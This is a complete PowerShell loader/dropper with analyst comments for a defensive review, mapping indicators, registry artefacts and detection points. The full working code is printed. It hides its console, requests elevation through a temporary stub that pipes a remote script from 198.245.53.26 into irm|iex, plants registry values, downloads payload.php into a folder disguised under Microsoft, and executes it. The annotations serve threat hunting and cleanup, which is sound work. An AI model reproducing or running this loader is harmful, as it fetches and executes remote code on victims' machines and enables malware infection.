<#
  Analyst annotation (defensive review).
  This is a multi-stage PowerShell loader/dropper, not a C# file: the only C#
  is the P/Invoke text passed to Add-Type. The code below is the original
  script with its statement line breaks restored (the page had it collapsed
  onto two lines); nothing else is changed. Comments mark behaviour, the
  artefacts it leaves, and where a defender can detect or clean it.

  Indicators present in the script itself:
    - Staging host http://198.245.53.26 over plain HTTP, paths /st.txt and
      /payload.php, User-Agent "PowerShell".
    - Registry: value "CU" under HKCU\Software\Microsoft\Windows that points
      at a per-run key HKCU\Software\Microsoft\<12 hex chars> holding the
      values "SvcName" and "FileName".
    - Drop directory %ProgramData%\Microsoft\<16 hex chars> (when elevated)
      or %APPDATA%\Microsoft\<16 hex chars> (when not), containing
      <20 hex chars>.txt, which is executed as PowerShell.
    - Transient elevation stub %TEMP%\<8 hex chars>.ps1.
    - Process environment variables _xR, _sN, _fN, _sU.
  Because the hex names mix the MachineGuid with DateTime.Now.Ticks, they
  differ on every run; the stable pivots for hunting are the "CU" value,
  the fixed host/URIs/User-Agent, and the command line of the elevated child.
#>

# Stage 0: hide the console. Compiles two Win32 imports and calls
# ShowWindow(GetConsoleWindow(), 0); nCmdShow 0 is SW_HIDE. -EA 0 is
# -ErrorAction SilentlyContinue, so a failed Add-Type is ignored.
Add-Type -Name W -Namespace H -MemberDefinition '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,int c);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();' -EA 0
[H.W]::ShowWindow([H.W]::GetConsoleWindow(),0)

# Force TLS 1.2 for .NET web calls (the downloads below are still plain HTTP).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Stage 1: elevation. If not already running as Administrator and the _xR
# marker is absent, write a one-line stub to %TEMP% and relaunch it with
# -Verb RunAs. This goes through the normal UAC consent prompt (it is a
# request, not a bypass). The stub sets _xR so the elevated copy does not
# loop, then fetches and invokes /st.txt with irm|iex (presumably this same
# script; only the URL is visible here). On success the unelevated parent
# exits; any failure is swallowed by the empty catch and execution continues
# unelevated.
# Detection: process creation of powershell.exe with
# "-NoP -EP Bypass -W Hidden -File <TEMP>\<8 hex>.ps1" spawned via RunAs;
# Script Block Logging (4104) will capture the irm|iex stub content.
$isAdmin=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if(-not $isAdmin -and -not $env:_xR){
    try{
        $__tb="$env:TEMP\$([guid]::NewGuid().ToString('N').Substring(0,8)).ps1"
        [IO.File]::WriteAllText($__tb,"[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;`$env:_xR='1';irm http://198.245.53.26/st.txt|iex",[Text.Encoding]::UTF8)
        $p=Start-Process powershell.exe -ArgumentList "-NoP -EP Bypass -W Hidden -File `"$__tb`"" -Verb RunAs -PassThru -EA Stop
        if($p){ exit }
    }catch{}
}

# Re-evaluated in the same process, so this yields the same value as above;
# it only matters when the elevated relaunch failed and we fell through.
$isAdmin=([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

# Stage 2: derive per-run names. MachineGuid is a stable host identifier;
# if it cannot be read a random GUID is used instead. Mixing in the current
# tick count means every execution produces new names, so the names alone
# are not a reusable IoC.
$guid=try{(Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Cryptography" -EA Stop).MachineGuid}catch{[guid]::NewGuid().ToString()}
$ts=[DateTime]::Now.Ticks.ToString()
$sha=[Security.Cryptography.SHA256]::Create()
# Three SHA-256 digests, hex-encoded and truncated to 16 / 20 / 12 chars.
$svcName=(($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($guid+"svc"+$ts))|%{$_.ToString("x2")})-join"").Substring(0,16)
$fileName=(($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($guid+"file"+$ts))|%{$_.ToString("x2")})-join"").Substring(0,20)
$regRandom=(($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($guid+"reg"+$ts))|%{$_.ToString("x2")})-join"").Substring(0,12)

# Stage 3: registry bookkeeping. A per-run key under HKCU\Software\Microsoft
# records the chosen names, and a fixed pointer value "CU" under
# HKCU\Software\Microsoft\Windows names that key. The "CU" value is the
# stable artefact to hunt for and the place to start cleanup: it leads to
# the dynamic key and, via SvcName/FileName, to the drop directory and file.
# (The script stores these for later use; nothing visible here consumes
# them, so they are presumably read by the downloaded stage.)
$dynReg="HKCU:\Software\Microsoft\$regRandom"
if(-not(Test-Path $dynReg)){New-Item -Path $dynReg -Force|Out-Null}
Set-ItemProperty -Path $dynReg -Name "SvcName" -Value $svcName -Force
Set-ItemProperty -Path $dynReg -Name "FileName" -Value $fileName -Force
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows" -Name "CU" -Value $dynReg -Force

# Stage 4: choose the drop location by privilege level, then download the
# next stage. The ".txt" extension and the "Microsoft" parent directory are
# chosen to look benign; file-creation telemetry for *.txt under
# %ProgramData%\Microsoft\<16 hex> or %APPDATA%\Microsoft\<16 hex>, written
# by powershell.exe, is a useful detection. Network: HTTP GET to
# 198.245.53.26/payload.php with User-Agent "PowerShell".
if($isAdmin){ $instDir="$env:ProgramData\Microsoft\$svcName" }else{ $instDir="$env:APPDATA\Microsoft\$svcName" }
if(-not(Test-Path $instDir)){md $instDir -Force|Out-Null}
$f="$instDir\$fileName.txt"
$wc=New-Object Net.WebClient
$wc.Headers.Add('User-Agent','PowerShell')
$wc.DownloadFile('http://198.245.53.26/payload.php',$f)

# Stage 5: hand the derived names to the next stage through the environment
# and execute the downloaded text in-process as a script block, passing its
# own path as -ScriptPath (so the payload is expected to declare that
# parameter — not verifiable from here). Script Block Logging (4104) and AMSI
# see the full content at [ScriptBlock]::Create time, which is the best
# capture point for the second stage.
$env:_sN=$svcName
$env:_fN=$fileName
$env:_sU='1'
& ([ScriptBlock]::Create((gc $f -Raw))) -ScriptPath $f